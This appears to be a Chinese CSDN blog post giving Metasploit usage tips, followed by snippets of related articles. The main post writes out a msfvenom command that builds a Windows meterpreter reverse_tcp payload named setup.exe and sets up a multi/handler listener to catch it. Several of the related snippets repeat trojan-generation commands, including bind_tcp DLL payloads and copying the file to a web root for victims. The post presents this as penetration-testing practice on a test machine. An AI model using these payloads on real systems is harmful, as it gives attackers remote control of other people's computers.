METASPLOIT配置使用小技巧

最新推荐文章于 2022-12-29 10:39:49 发布
最新推荐文章于 2022-12-29 10:39:49 发布
阅读量200 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjwqp/article/details/105165527
版权

METASPLOIT配置使用小技巧

msfvenom命令行下服务和端口配置

 

msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=6666 -f exe > /root/setup.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=6666 -f exe > /root/setup.exe


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp                                                  
msf5 exploit(multi/handler) > set LHOST 192.168.xxx.xxx
LHOST => 192.168.xxx.xxx                                                  
msf5 exploit(multi/handler) > set LPORT 6666                               
LPORT => 6666    

开始测试靶机。。。                                                        
msf5 exploit(multi/handler) > exploit                                      
                                                                           
[*] Started reverse TCP handler on 192.168.xxx.xxx:6666          

然后在测试靶机上运行setup.exe。

 

grn0bmp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Armitage使用手册v1.1.7.pdf
07-18
这款工具不仅适合 Metasploit 的初学者学习 MSF使用技巧和渗透方法,同时也让有经验的安全专家能够减少手动输入命令的时间,提高效率。此外,Armitage 还特别适用于团队作业,能够有效地组织团队成员共同完成复杂...
小迪第九期渗透培训
11-19
- **MSF 利用**:使用 Metasploit 框架进行 WebShell 权限提升。 - **端口转发**:通过端口转发技术访问内网资源。 - **PC 控制**:远程控制目标计算机,执行特定任务。 - **Beef 框架应用**:结合 BeEF 和 Ettercap...
Metasploit 工具(pattern_create.rb)使用前设置
一个热爱逆向,喜爱学习、分享的猿。
12-02 3787
首先去官网下载metasploit的linux安装包并安装。 安装完成后想单独使用其用ruby编写的工具,如pattern_create.rb(/opt/metasploit/apps/pro/msf3/tools/exploit/),下面介绍配置好可以使用这些工具的环境的过程。
MSF-一些入门权限提升技巧
凝聚力安全团队
07-22 423
提高程序运行级别描述操作利用UAC绕过描述模块利用提权漏洞进行提权描述:操作 提高程序运行级别 描述 利用高权限的方式去重启一个session,并不是真正意义上的提权,并没有真的去绕过用户的完全控制权限,会触发uac,当用户点击之后才会出现新的高权限的session 操作利用 msf模块 use exploit/windows/local/ask 查看模块信息: info 设置session id,即设置uac弹窗名称 然后run,发现用户那边出现了uac提示 用户点击否后,将会提
MSF使用技巧
永远是少年
06-08 4246
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用技巧。 一、MSF命令行开启 二、MSF退出 三、MSF 数据库导入和导出 四、MSF会话设置
metasploit framework 笔记 | msf5 使用技巧
VI___
02-02 5243
一、典型的攻击步骤 ① use exploit/操作系统类型/漏洞类型/具体漏洞模块名称 ——指定要使用漏洞利用模块 ② set SRVHOST 攻击源IP ③ set PAYLOAD windows/meterpreter/reverse_tcp ——设置攻击载荷,也就是 shellcode,可以用来接收反弹的shell ④ set LHOST 被攻击者IP ⑤ expl...
【2023版】Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置使用技巧指南
最新发布
QIANDXX的博客
12-29 4664
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
MSF用户指南.docx
06-02
通过这个用户指南,读者将全面了解Metasploit Framework的使用,从基础配置到高级技巧,为进行有效的渗透测试提供坚实的基础。无论是为了提高个人技能还是进行企业安全评估,这本书都是不可或缺的资源。
安全实验室:基于流浪者的安全实验室。 生成虚拟机以学习安全性的快速方法
02-06
3. **安全工具的实践**:安装和使用各种网络安全工具,如Nessus(漏洞扫描)、Wireshark(网络嗅探)、Metasploit(渗透测试框架)等。 4. **多系统交互**:在不同操作系统之间建立通信,了解跨平台的安全风险和...
安全备忘单:for各种信息安全工具和主题的备忘单的集合
01-30
例如,它可能包含有关Nmap、Wireshark、Metasploit、Snort等网络安全工具的使用技巧和安全提示,以及对SQL注入、XSS攻击等常见安全威胁的防御方法。 通过学习这些备忘单,无论是初级的系统管理员还是经验丰富的安全...
Kali Linux渗透之Metasploit攻防实战技巧
04-12
一、课程概要       本课程主要分享Kali Linux渗透之Metasploit攻防实战技巧! 二、适合人员       1、大学生       2、IT技术员       3、运维工程师       4、服务器工程师       5、渗透测试工程师
Metasploit 使用msfconsole帮助功能技巧
大学霸__IT达人
03-31 675
Metasploit使用msfconsole帮助功能技巧 当用户使用Metasploit框架时,通常都是直接执行msfconsole,进入MSF终端。此时,将使用所有默认设置启动了Metasploit框架。用户也可以在启动时,进行简单配置。为了帮助用户配置Metasploit框架,启动MSF终端时,使用msfconsole--help技巧查看更多可以配置的选项。然后,在执行msfconsole...
MSF使用总结
qq_44657899的博客
09-25 4191
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
metasploit使用介绍
qq_57223070的博客
10-12 4834
一些个人见解,希望能够对你有所帮助!
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 2830
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
MSF笔记(二)
Recar的博客
07-15 3751
密码破解模块Ssh服务口令猜测SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题!!!!!!!!!!!! 如果知道什么漏洞,然后想找模块,就如Sear
内网渗透思路01之MeTasploit来实现端口转发与端口映射
划水的小白白
03-06 539
小说明:攻击者拿下“ 2008服务器 ”,不能直接访问内网中的“ 数据服务器 ” 生成metasploit后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.115 lport=12345 -f exe >/var/www/html/ss.exe 将木马文件上传至受害者机器 攻击者Kali开启监听 use exploit/multi/handler set payload windows/meterpreter/.
msf生成木马
qq_44657899的博客
04-03 4190
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值